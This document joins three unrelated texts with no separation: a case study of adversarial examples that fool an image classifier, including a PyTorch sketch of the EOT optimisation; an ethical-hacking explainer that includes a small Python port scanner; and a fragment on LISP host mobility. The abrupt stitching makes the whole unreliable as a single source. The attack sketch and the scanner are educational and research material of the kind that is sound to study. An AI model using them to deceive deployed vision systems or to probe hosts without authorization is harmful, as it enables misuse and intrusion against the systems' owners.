Researchers developed an algorithm that can trick neural network-based image classifiers into misclassifying images of 2D and 3D objects. The perturbations to the images are undetectable to humans but caused Google's image classifier to miscategorise the inputs 96% of the time for 2D images and 84% for 3D objects.

Targeting Google's InceptionV3 image classifier, the researchers developed a new algorithm "for reliably producing adversarial examples that cause targeted misclassification under transformations like blur, rotation, zoom, or translation, and we use it to generate both 2D printouts and 3D models that fool a standard neural network at any angle. Our process works for arbitrary 3D models. The examples still fool the neural network when we put them in front of semantically relevant backgrounds; for example, you’d never see a rifle underwater, or an espresso in a baseball mitt." (labsix.org)

From the arXiv paper: "By introducing EOT, a general-purpose algorithm for the creation of robust examples under any chosen distribution, and modeling 3D rendering and printing within the framework of EOT, we succeed in fabricating three-dimensional adversarial examples. In particular, with access only to low-cost commercially available 3D printing technology, we successfully print physical adversarial objects that are strongly classified as a desired target class over a variety of angles, viewpoints, and lighting conditions by a standard ImageNet classifier."

Labsix.org: "Our work demonstrates that adversarial examples are a significantly larger problem in real world systems than previously thought."

The generated 2D images were 96.4% adversarial, while the 3D models had "an average adversariality of 84.0% with a long left tail, showing that EOT usually produces highly adversarial objects". For the photos of the 3D-printed objects, the adversarial percentage was 82% for the turtle and 59% for the baseball.

"We produce 3D adversarial examples by modeling the 3D rendering as a transformation under EOT [the algorithm]. Given a textured 3D object, we optimize over the texture such that the rendering is adversarial from any viewpoint. We consider a distribution that incorporates different camera distances, lateral translation, rotation of the object, and solid background colors. We consider 5 complex 3D models, choose 20 random target classes per model, and use EOT to synthesize adversarial textures for the models with minimal parameter search".

For the physical object test: "We choose target classes for each of the models at random — “rifle” for the turtle, and “espresso” for the baseball — and we use EOT to synthesize adversarial examples. We evaluate the performance of our two 3D-printed adversarial objects by taking 100 photos of each object over a variety of viewpoints." (arXiv paper)

From labsix's website: "Neural network based classifiers reach near-human performance in many tasks, and they’re used in high risk, real world systems. Yet, these same neural networks are particularly vulnerable to adversarial examples, carefully perturbed inputs that cause targeted misclassification." However, as the researchers state in their arXiv paper, "The existence of adversarial examples for neural networks has until now been largely a theoretical concern. While minute, carefully-crafted perturbations can cause targeted misclassification in a neural network, adversarial examples produced using standard techniques lose adversariality when directly translated to the physical world as they are captured over varying viewpoints and affected by natural phenomena such as lighting and camera noise. This phenomenon suggests that practical systems may not be at risk because adversarial examples generated using standard techniques are not robust in the physical world."

The inputs were RGB images of 2D images and 3D models. From the arXiv paper, for the 2D images: "We take the first 1000 images in the ImageNet validation set, randomly choose a target class for each image, and use EOT to synthesize an adversarial example that is robust over the chosen distribution". In the 3D models case: "For each of the 100 adversarial examples, we sample 100 random transformations from the distribution".
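The case study describes EOT (Expectation Over Transformation) only at a high level, so the PyTorch-style sketch below is our own simplified 2D illustration of the core idea: optimizing a perturbation so that the target class is predicted in expectation over a distribution of transformations. Function names, hyperparameters, and the projection step are assumptions, not labsix's actual implementation.

```python
# Simplified 2D sketch of the EOT idea; illustrative, not the paper's code.
import random
import torch
import torch.nn.functional as F

def eot_attack(model, x, target, transforms, steps=500, lr=0.01, eps=0.05):
    """Find a small perturbation of image batch `x` such that `model`
    predicts class `target` in expectation over sampled transformations."""
    delta = torch.zeros_like(x, requires_grad=True)
    optimizer = torch.optim.Adam([delta], lr=lr)
    for _ in range(steps):
        t = random.choice(transforms)            # sample one transformation
        logits = model(t((x + delta).clamp(0, 1)))
        loss = F.cross_entropy(logits, target)   # push toward the target class
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        with torch.no_grad():
            delta.clamp_(-eps, eps)              # keep the perturbation small
    return (x + delta).clamp(0, 1).detach()
```

Here `transforms` would hold differentiable versions of the nuisance transformations (rotation, blur, scaling, and so on); averaging the loss over several sampled transformations per step gives a better estimate of the expectation. The paper's 3D case replaces these image transforms with a differentiable renderer mapping an object texture to an image.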
Hackers are widely understood to be shady networking experts, coders, and computer professionals with malicious intent toward online cyberspace. These hackers, also called 'cybercriminals', aim to illegally infiltrate computer systems so that they can get access to precious data. This data includes confidential records, bank account details, imagery, authentication credentials, and all other kinds of sensitive information that could be monetized. The data is either sold, processed, manipulated, or held for ransom.

While a general perception of hacking exists in the broader community, the concept of ethical hacking still seems alien to many people. The negative connotations attached to the word 'hacking' itself may make the preceding term 'ethical' seem contradictory and, consequently, somewhat confusing.

Hacking is merely finding the existing loopholes and vulnerabilities in security systems. The path the hacker follows after that step is what differentiates the bad guys from the good. Criminals use their exploits to gain further access and pursue malicious objectives. Ethical hackers use theirs to inform the systems' owners about the vulnerabilities so that they can be remediated. Another critical difference between ethical hackers, or 'white hat' hackers, and cybercriminals is that ethical hackers seek permission from the owners before infiltrating the systems; the entire premise of criminal hacking, in contrast, is to gain access illegally.

Why Ethical Hacking is Important

A different perspective is vital for the resilience of security systems. The team behind the system architecture and the security infrastructure can only gauge the system's strength from their own point of view, since they developed it. Many vulnerabilities go unnoticed when a system is checked from a single perspective, which makes ethical hacking crucial: white hat hackers can uncover vulnerabilities that were previously unknown to the developers, and that outside perspective makes all the difference.

Moreover, letting an ethical hacker attack your information stronghold simulates an actual cybercriminal attempting to penetrate the company's defenses. This is why the company provides no information to the ethical hacker; the hacker must gather intelligence on their own, as any cybercriminal would.

Companies Want Ethical Hackers

Ethical hackers are invited to infiltrate company defenses for several reasons. Doing so lets companies outsource security scans and then resolve the issues without too much service downtime. White hat hackers are welcome to work under the vulnerability disclosure policy published by the organization, which lets it supervise the work of white hat hackers, who are just as skilled as the 'black hat' hackers (cybercriminals). Beyond vulnerability disclosure policies, many companies run bug bounty schemes to further incentivize ethical hacking. Hackers who find, expose, and report bugs and cracks in company systems to the owners receive substantial financial compensation and sometimes permanent jobs. Added to the threat of being caught by the law, this gives black hat hackers more incentive to help organizations instead of attacking them.
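As a concrete taste of the reconnaissance step described above, here is a minimal Python sketch of a TCP connect scan, which checks which common ports on a host accept connections. The hostname is a placeholder, and, as the article stresses, permission is the dividing line: run anything like this only against systems you have explicit written authorization to test.

```python
# Minimal TCP connect scan: reconnaissance against an AUTHORIZED target only.
import socket

def scan(host, ports, timeout=1.0):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

# Placeholder host; substitute a system you are authorized to assess.
print(scan("host.example.com", [22, 80, 443, 8080]))
```

Real assessments use far more capable tooling, but even this simple probe illustrates how an outside party maps a system's exposed surface before looking for vulnerabilities.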
LISP host mobility use cases

Locator/ID Separation Protocol (LISP) allows hosts to move from one site to another while maintaining their assigned IP addresses. There are two fundamental ways this can be configured:

- LISP Host Mobility with an Extended Subnet - This option physically extends the subnet to a different site using OTV, VPLS, or other LAN extension technologies. When a host moves, it keeps the same IP address within the same subnet, so the problem of changing IP addresses is eliminated.
- LISP Host Mobility Across Subnets - This option allows a host to migrate to a remote IP subnet while retaining its original IP address, using a mapping mechanism (sketched below).
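To make the mapping mechanism concrete, here is a toy Python model of a LISP mapping database. In LISP, a host's identity (its endpoint identifier, or EID) is decoupled from its location (the routing locator, or RLOC); when the host moves, only the RLOC entry changes. The addresses are invented, and this sketch deliberately omits the real control-plane machinery (Map-Register and Map-Request messages, ITRs and ETRs, and so on).

```python
# Toy model of a LISP mapping system: EIDs stay fixed while RLOCs change.
mapping_db = {"10.1.1.10": "192.0.2.1"}  # EID -> RLOC (host at site A)

def map_request(eid):
    """Resolve a host's EID to the locator of the site where it currently lives."""
    return mapping_db.get(eid)

def host_moved(eid, new_rloc):
    """Update only the locator; the host keeps its original IP address (EID)."""
    mapping_db[eid] = new_rloc

host_moved("10.1.1.10", "198.51.100.1")  # VM migrates to site B
assert map_request("10.1.1.10") == "198.51.100.1"
```

Traffic destined to 10.1.1.10 is now encapsulated toward site B's locator, while the host itself never has to renumber.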